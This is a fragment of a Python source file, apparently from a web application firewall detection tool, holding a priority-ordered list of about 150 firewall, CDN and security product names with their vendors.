  7 | # NOTE: this priority list is used so that each check can be prioritized,
  8 | # so that the quick checks are done first and ones that require more
  9 | # requests, are done later
 10 | 
 11 | 
 12 | wafdetectionsprio = [
 13 |     'ACE XML Gateway (Cisco)',
 14 |     'aeSecure (aeSecure)',
 15 |     'AireeCDN (Airee)',
 16 |     'Airlock (Phion/Ergon)',
 17 |     'Alert Logic (Alert Logic)',
 18 |     'AliYunDun (Alibaba Cloud Computing)',
 19 |     'Anquanbao (Anquanbao)',
 20 |     'AnYu (AnYu Technologies)',
 21 |     'Approach (Approach)',
 22 |     'AppWall (Radware)',
 23 |     'Armor Defense (Armor)',
 24 |     'ArvanCloud (ArvanCloud)',
 25 |     'ASP.NET Generic (Microsoft)',
 26 |     'ASPA Firewall (ASPA Engineering Co.)',
 27 |     'Astra (Czar Securities)',
 28 |     'AWS Elastic Load Balancer (Amazon)',
 29 |     'AzionCDN (AzionCDN)',
 30 |     'Azure Front Door (Microsoft)',
 31 |     'Barikode (Ethic Ninja)',
 32 |     'Barracuda (Barracuda Networks)',
 33 |     'Bekchy (Faydata Technologies Inc.)',
 34 |     'Beluga CDN (Beluga)',
 35 |     'BIG-IP Local Traffic Manager (F5 Networks)',
 36 |     'BinarySec (BinarySec)',
 37 |     'BitNinja (BitNinja)',
 38 |     'BlockDoS (BlockDoS)',
 39 |     'Bluedon (Bluedon IST)',
 40 |     'BulletProof Security Pro (AITpro Security)',
 41 |     'CacheWall (Varnish)',
 42 |     'CacheFly CDN (CacheFly)',
 43 |     'Comodo cWatch (Comodo CyberSecurity)',
 44 |     'CdnNS Application Gateway (CdnNs/WdidcNet)',
 45 |     'ChinaCache Load Balancer (ChinaCache)',
 46 |     'Chuang Yu Shield (Yunaq)',
 47 |     'Cloudbric (Penta Security)',
 48 |     'Cloudflare (Cloudflare Inc.)',
 49 |     'Cloudfloor (Cloudfloor DNS)',
 50 |     'Cloudfront (Amazon)',
 51 |     'CrawlProtect (Jean-Denis Brun)',
 52 |     'DataPower (IBM)',
 53 |     'DenyALL (Rohde & Schwarz CyberSecurity)',
 54 |     'Distil (Distil Networks)',
 55 |     'DOSarrest (DOSarrest Internet Security)',
 56 |     'DotDefender (Applicure Technologies)',
 57 |     'DynamicWeb Injection Check (DynamicWeb)',
 58 |     'Edgecast (Verizon Digital Media)',
 59 |     'Eisoo Cloud Firewall (Eisoo)',
 60 |     'Expression Engine (EllisLab)',
 61 |     'BIG-IP AppSec Manager (F5 Networks)',
 62 |     'BIG-IP AP Manager (F5 Networks)',
 63 |     'Fastly (Fastly CDN)',
 64 |     'FirePass (F5 Networks)',
 65 |     'FortiWeb (Fortinet)',
 66 |     'GoDaddy Website Protection (GoDaddy)',
 67 |     'Greywizard (Grey Wizard)',
 68 |     'Huawei Cloud Firewall (Huawei)',
 69 |     'HyperGuard (Art of Defense)',
 70 |     'Imunify360 (CloudLinux)',
 71 |     'Incapsula (Imperva Inc.)',
 72 |     'IndusGuard (Indusface)',
 73 |     'Instart DX (Instart Logic)',
 74 |     'ISA Server (Microsoft)',
 75 |     'Janusec Application Gateway (Janusec)',
 76 |     'Jiasule (Jiasule)',
 77 |     'Kona SiteDefender (Akamai)',
 78 |     'KS-WAF (KnownSec)',
 79 |     'KeyCDN (KeyCDN)',
 80 |     'LimeLight CDN (LimeLight)',
 81 |     'LiteSpeed (LiteSpeed Technologies)',
 82 |     'Open-Resty Lua Nginx (FLOSS)',
 83 |     'Oracle Cloud (Oracle)',
 84 |     'Malcare (Inactiv)',
 85 |     'MaxCDN (MaxCDN)',
 86 |     'Mission Control Shield (Mission Control)',
 87 |     'ModSecurity (SpiderLabs)',
 88 |     'NAXSI (NBS Systems)',
 89 |     'Nemesida (PentestIt)',
 90 |     'NevisProxy (AdNovum)',
 91 |     'NetContinuum (Barracuda Networks)',
 92 |     'NetScaler AppFirewall (Citrix Systems)',
 93 |     'Newdefend (NewDefend)',
 94 |     'NexusGuard Firewall (NexusGuard)',
 95 |     'NinjaFirewall (NinTechNet)',
 96 |     'NullDDoS Protection (NullDDoS)',
 97 |     'NSFocus (NSFocus Global Inc.)',
 98 |     'OnMessage Shield (BlackBaud)',
 99 |     'Palo Alto Next Gen Firewall (Palo Alto Networks)',
100 |     'PerimeterX (PerimeterX)',
101 |     'PentaWAF (Global Network Services)',
102 |     'pkSecurity IDS (pkSec)',
103 |     'PT Application Firewall (Positive Technologies)',
104 |     'PowerCDN (PowerCDN)',
105 |     'Profense (ArmorLogic)',
106 |     'Puhui (Puhui)',
107 |     'Qiniu (Qiniu CDN)',
108 |     'Reblaze (Reblaze)',
109 |     'RSFirewall (RSJoomla!)',
110 |     'RequestValidationMode (Microsoft)',
111 |     'Sabre Firewall (Sabre)',
112 |     'Safe3 Web Firewall (Safe3)',
113 |     'Safedog (SafeDog)',
114 |     'Safeline (Chaitin Tech.)',
115 |     'SecKing (SecKing)',
116 |     'eEye SecureIIS (BeyondTrust)',
117 |     'SecuPress WP Security (SecuPress)',
118 |     'SecureSphere (Imperva Inc.)',
119 |     'Secure Entry (United Security Providers)',
120 |     'SEnginx (Neusoft)',
121 |     'ServerDefender VP (Port80 Software)',
122 |     'Shield Security (One Dollar Plugin)',
123 |     'Shadow Daemon (Zecure)',
124 |     'SiteGround (SiteGround)',
125 |     'SiteGuard (Sakura Inc.)',
126 |     'Sitelock (TrueShield)',
127 |     'SonicWall (Dell)',
128 |     'UTM Web Protection (Sophos)',
129 |     'Squarespace (Squarespace)',
130 |     'SquidProxy IDS (SquidProxy)',
131 |     'StackPath (StackPath)',
132 |     'Sucuri CloudProxy (Sucuri Inc.)',
133 |     'Tencent Cloud Firewall (Tencent Technologies)',
134 |     'Teros (Citrix Systems)',
135 |     'Trafficshield (F5 Networks)',
136 |     'TransIP Web Firewall (TransIP)',
137 |     'URLMaster SecurityCheck (iFinity/DotNetNuke)',
138 |     'URLScan (Microsoft)',
139 |     'UEWaf (UCloud)',
140 |     'Varnish (OWASP)',
141 |     'Viettel (Cloudrity)',
142 |     'VirusDie (VirusDie LLC)',
143 |     'Wallarm (Wallarm Inc.)',
144 |     'WatchGuard (WatchGuard Technologies)',
145 |     'WebARX (WebARX Security Solutions)',
146 |     'WebKnight (AQTRONIX)',
147 |     'WebLand (WebLand)',
148 |     'RayWAF (WebRay Solutions)',
149 |     'WebSEAL (IBM)',
150 |     'WebTotem (WebTotem)',
151 |     'West263 CDN (West263CDN)',
152 |     'Wordfence (Defiant)',
153 |     'WP Cerber Security (Cerber Tech)',
154 |     'WTS-WAF (WTS)',
155 |     '360WangZhanBao (360 Technologies)',
156 |     'XLabs Security WAF (XLabs)',
157 |     'Xuanwudun (Xuanwudun)',
158 |     'Yundun (Yundun)',
159 |     'Yunsuo (Yunsuo)',
160 |     'Yunjiasu (Baidu Cloud Computing)',
161 |     'YXLink (YxLink Technologies)',
162 |     'Zenedge (Zenedge)',
163 |     'ZScaler (Accenture)'
164 | ]
165 | 


--------------------------------------------------------------------------------